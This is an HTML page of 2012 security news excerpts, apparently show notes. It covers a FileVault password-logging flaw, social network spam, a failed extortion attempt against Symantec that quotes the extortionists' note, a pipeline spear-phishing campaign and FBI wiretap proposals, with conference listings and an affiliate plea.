<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hack3rCon^3</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 19-21, 2012</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Charleston, WV <br class="kix-line-break" /><br />
	</span><a href="http://hack3rcon.org/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://hack3rcon.org/</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Skydogcon<br class="kix-line-break" /><br />
	</span><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: October 26-28<br class="kix-line-break" /><br />
	Where: Hotel Preston in Nashville, TN <br class="kix-line-break" /><br />
	</span><a href="http://www.skydogcon.com"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.skydogcon.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Please consider making your Amazon purchases through our affiliate link. &nbsp;If you&rsquo;re not familiar with the affiliate link it is locate the Affiliate Program link on the right hand side.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Or simply use our QR Code Links.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon:</span><img height="135px;" src="https://lh3.googleusercontent.com/7ZXAHt-a9jRrAqmSQKmA7B6mmrRMagw7evCANxVFzU0Bpcd7hAXbv_dS3A_lRWRmrpOgYEzrL6p3vbLvsbeCqt6nJp62OAGCcir-ChdS42njGjXDbzQ" width="135px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Amazon UK:</span><img height="138px;" src="https://lh5.googleusercontent.com/peqXuyis3o4OAThAh4TRMwxKT_PJpANKSiUTVv7-xpQR6L2K-DYyWk5RW-uGCnro2gxATcnfd2hvjUxL2ulg4Qlod13YU5mnqr-n5vEUDf9za0pg4w8" width="138px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://nakedsecurity.sophos.com/2012/05/06/apple-update-to-os-x-lion-exposes-encryption-passwords/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://nakedsecurity.sophos.com/2012/05/06/apple-update-to-os-x-lion-exposes-encryption-passwords/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Apple&#39;s had a rough time lately on the security front. Last month it was caught out having delayed the release of a security update for Java, resulting in more than </span><a href="http://nakedsecurity.sophos.com/2012/04/05/mac-botnets-gaining-traction-using-drive-by-java-exploit/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">600,000 Macs</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> being recruited into a botnet. Now a quality assurance mistake can cause OS X users&#39; FileVault encryption passwords to be exposed.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Friday, David Emery posted to an encryption mailing list disclosing this flaw in the latest OS X Lion security update, 10.7.3, which was released in February.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">It appears that a debug option was accidentally left enabled in FileVault, resulting in the user&#39;s password being saved in plain text in a log file accessible outside of the encrypted area.</span><img height="333px;" src="https://lh5.googleusercontent.com/T_QM1QyGNujBrvsUFP2nT-DpUiQcPq_m6T1E2aFmoKRUqGeuurq80wawZtBJIsR02JonCszX44h-o7lTC0qUrqsrVTxz5fz7YHdAUFmvFa-uzz6vsTg" width="333px;" /></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Anyone with access to the disk can read the file containing the password and use it to log into the encrypted area of the disk, rendering the encryption pointless and permitting access to potentially sensitive documents. This could occur through theft, physical access, or a piece of malware that knows where to look.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">To my knowledge, this only applies to users of Snow Leopard who used the FileVault encryption option for their home directories. It does not impact users of FileVault2 who have turned on Apple&#39;s full disk encryption, nor does it impact users who did not upgrade from Snow Leopard.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The best course of action is to implement a full disk encryption solution like Sophos SafeGuard for Mac or Apple&#39;s included FileVault 2.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:'Droid Serif';color:#222222;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2012/05/06/social_network_spam/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2012/05/06/social_network_spam/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Cybercrims have quit pouring barrels of spam into email inboxes in favour of hassling marks on social networks as an easier way to make money.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The dismantling of remote-controllable armies of compromised PCs, the collapse of some shady affiliate advertising networks, and better spam-filtering technology have all resulted in a decrease in traditional email spam delivery.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">However, dodgy messaging to promote sites selling knock-off goods, pills to enhance performance beneath the sheets, and other tat, has only been displaced rather than destroyed. Twitter and Facebook have both become primary conduits for spam in the process &#8211; and the messages sent usually look far more convincing.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Paul Judge, chief research officer at Barracuda Networks, said that one in 100 tweets on Twitter and one in 60 messages on Facebook were either spam or malicious. The switch from email was an obvious move for crooks because social networks are where the majority of internet users spend their time, Judge told delegates at Barracuda&#39;s technical conference in Munich on Friday.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Wherever users are attackers will follow,&quot; he explained.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Judge described automated tools used to set up fake accounts on Facebook. These accounts use like-jacking (a form of </span><a href="http://www.theregister.co.uk/2009/01/27/internet_explorer_clickjacking_block/"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">click-jacking</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">), among other techniques, to trick users into landing on pages that promote survey scams, earning miscreants affiliate revenue in the process. The nuisance level created by fake accounts is not in proportion to their actual number, which Judge admitted was hard to quantify. He compared the situation to the early days of email spam.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Tools are available to automatically generate a profile and make it look like a real user by adding likes and places of education attended, for example,&quot; Judge explained. Fake profile are very different from legitimate profiles: 97 per cent of fakes are female, compared to 40 per cent of the real population on Facebook, and 58 per cent claim to be bisexual females, compared to 6 per cent of the real female users of the social network who say they like both men and women. Fake profiles also tend to have &quot;more friends&quot;, 726 on average compared to the 130 average for the general Facebook population.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:'Droid Serif';color:#222222;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.infosecisland.com/blogview/21238-Symantec-Targeted-in-Source-Code-Extortion-Scheme.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.infosecisland.com/blogview/21238-Symantec-Targeted-in-Source-Code-Extortion-Scheme.html</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Symantec was the target of an unsuccessful extortion scheme devised by an unknown group on Friday, May 4th.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The extortionists, who go by the name &quot;l3g4nd crew&quot;, claimed to be in possession of the complete source code for the company&#39;s Norton antivirus product.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In a Pastebin posting, the group threatened to release the code today if Symantec did not engage in negotiations and succumb to a demand for a monetary payoff.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The </span><a href="http://pastebin.com/gSAUT5NE"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">original Pastebin posting</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> also contained a sample of code, but the page is no longer avalable.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The following</span><a href="http://pastebin.com/XkPNsCuT"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;"> Pastebin post</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, which was still present at the time this article was written, contains a copy of the extortion threat, but no sample of code:</span></p>
<p dir="ltr" style="margin-left: 18pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Dear Symantec officials,</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 18pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">We would like to inform you that we finally exploited Norton internet security 2012, this exploit made an error in Norton and by mistake exposed its FULL SOURCE CODE, we then checked it several time to be sure, also we would like to tell you that you fool highness inserted a lot of sensitive information in the code, we actually disclosed the top secret virus protection technique of Symantec Norton 2012 and we will be publishing it on Monday unless we had a little t$lk, the source code will also be published on several paste websites including this site, and also for informational reasons the source code &nbsp;will be identified by this hashed title:</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 18pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;bDNnNG5kQHlhaG9vLmNvbQ==&quot; &nbsp;&nbsp;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 18pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">search pastebin.com on Monday for it if Symantec didn&#39;t just give me the demand$.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 18pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">l3g4nd crew. our email : l3g4nd@yahoo.com to discus about th$.</span></p>
<p dir="ltr" style="margin-left: 18pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Infosec Island editors contacted Symantec officials last Friday and provided them with the link to the Pastebin post after becoming aware of the scheme by way of a Google Alerts notification.</span></p>
<p dir="ltr" style="margin-left: 18pt;margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">x&ldquo;Symantec&rsquo;s internal information security team has analyzed the code that was posted and has determined it is NOT Symantec source code,&quot; Cris Paden, Sr. Manager for Corporate Communications at Symantec, said in an email statement provided to Infosec Island.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;Without disclosing our process of testing and tip our hand to hackers for a continued possible workaround, our team has determined, in effect, the program/code in question is a DOS batch file, i.e., a utility, designed to keep Microsoft Office 2010 in a perpetual trial mode. &nbsp;More information can be found at: &nbsp;</span><a href="http://forums.mydigitallife.info/threads/23462-IORRT-The-Official-Office-2010-VL-Rearm-Solution"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://forums.mydigitallife.info/threads/23462-IORRT-The-Official-Office-2010-VL-Rearm-Solution</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">,&quot; Paden said.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:'Droid Serif';color:#222222;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.csmonitor.com/USA/2012/0505/Alert-Major-cyber-attack-aimed-at-natural-gas-pipeline-companies"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.csmonitor.com/USA/2012/0505/Alert-Major-cyber-attack-aimed-at-natural-gas-pipeline-companies</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A major cyber attack is currently under way aimed squarely at computer networks belonging to </span><a href="http://www.csmonitor.com/tags/topic/United+States"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">US</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> natural gas pipeline companies, according to alerts issued to the industry by the US Department of Homeland Security.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">At least three confidential &quot;amber&quot; alerts &ndash; the second most sensitive next to &quot;red&quot; &ndash; were issued by DHS beginning March 29, all warning of a &quot;gas pipeline sector cyber intrusion campaign&quot; against multiple pipeline companies. But the wave of cyber attacks, which apparently began four months ago &ndash; and may also affect Canadian natural gas pipeline companies &ndash; is continuing.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">That fact was reaffirmed late Friday in a public, albeit less detailed, &quot;incident response&quot; report from the Industrial Control Systems Cyber Emergency Response Team (ICS-CERT), an arm of DHS based in </span><a href="http://www.csmonitor.com/tags/topic/Idaho+Falls"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Idaho Falls</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, Idaho. It reiterated warnings in the earlier confidential alerts made directly to pipeline companies and some power companies.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The ICS-CERT is charged with helping secure the nation&#39;s industrial control systems &ndash; computerized systems that open and close valves, switches, and factory processes vital to the chemical, industrial, and power sectors. Their &quot;fly away&quot; teams visit factories, power plants, and pipeline companies to investigate cyber intrusions.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;ICS-CERT has recently identified an active series of cyber intrusions targeting natural gas pipeline sector companies,&quot; the confidential April 13 alert warns. &quot;Multiple natural gas pipeline organizations have reported either attempts or intrusions related to this campaign. The campaign appears to have started in late December 2011 and is active today.&quot;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Safeguarding industrial control systems from cyber attack is a major point of debate right now in Congress, which has been wrangling over whether to grant the federal government authority to require that vital sectors like the electric utility, oil and gas, and chemical industries meet certain levels of cyber security.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Approximately 200,000 miles of these interstate natural gas transmission pipelines in the US supply 25 percent of the nation&#39;s energy. Pipeline safety has been a major issue in recent years, highlighted by the </span><a href="http://www.csmonitor.com/tags/topic/San+Bruno"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">San Bruno</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, </span><a href="http://www.csmonitor.com/tags/topic/California"><span style="font-size:13px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Calif.</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> pipeline explosion that killed eight people and destroyed 38 homes in the Bay Area in September 2010.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In Friday&#39;s public warning, ICS-CERT reaffirms that its &quot;analysis of the malware and artifacts associated with these cyber attacks has positively identified this activity as related to a single campaign from a single source.&quot; It goes on to broadly describe a sophisticated &quot;spear-phishing&quot; campaign &ndash; an approach in which cyber attackers attempt to establish digital beachheads within corporate networks.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:'Droid Serif';color:#222222;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.cnet.com/8301-1009_3-57428067-83/fbi-we-need-wiretap-ready-web-sites-now/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.cnet.com/8301-1009_3-57428067-83/fbi-we-need-wiretap-ready-web-sites-now/</span></a></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI is asking Internet companies not to oppose a controversial proposal that would require firms, including Microsoft, Facebook, Yahoo, and Google, to build in backdoors for government surveillance.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In meetings with industry representatives, the White House, and U.S. senators, senior FBI officials argue the dramatic shift in communication from the telephone system to the Internet has made it far more difficult for agents to wiretap Americans suspected of illegal activities, CNET has learned.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI general counsel&#39;s office has drafted a proposed law that the bureau claims is the best solution: requiring that social-networking Web sites and providers of VoIP, instant messaging, and Web e-mail alter their code to ensure their products are wiretap-friendly.</span></p>
<p dir="ltr" style="margin-right: 4.5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;If you create a service, product, or app that allows a user to communicate, you get the privilege of adding that extra coding,&quot; an industry representative who has reviewed the FBI&#39;s draft legislation told CNET. The requirements apply only if a threshold of a certain number of users is exceeded, according to a second industry representative briefed on it.</span></p>
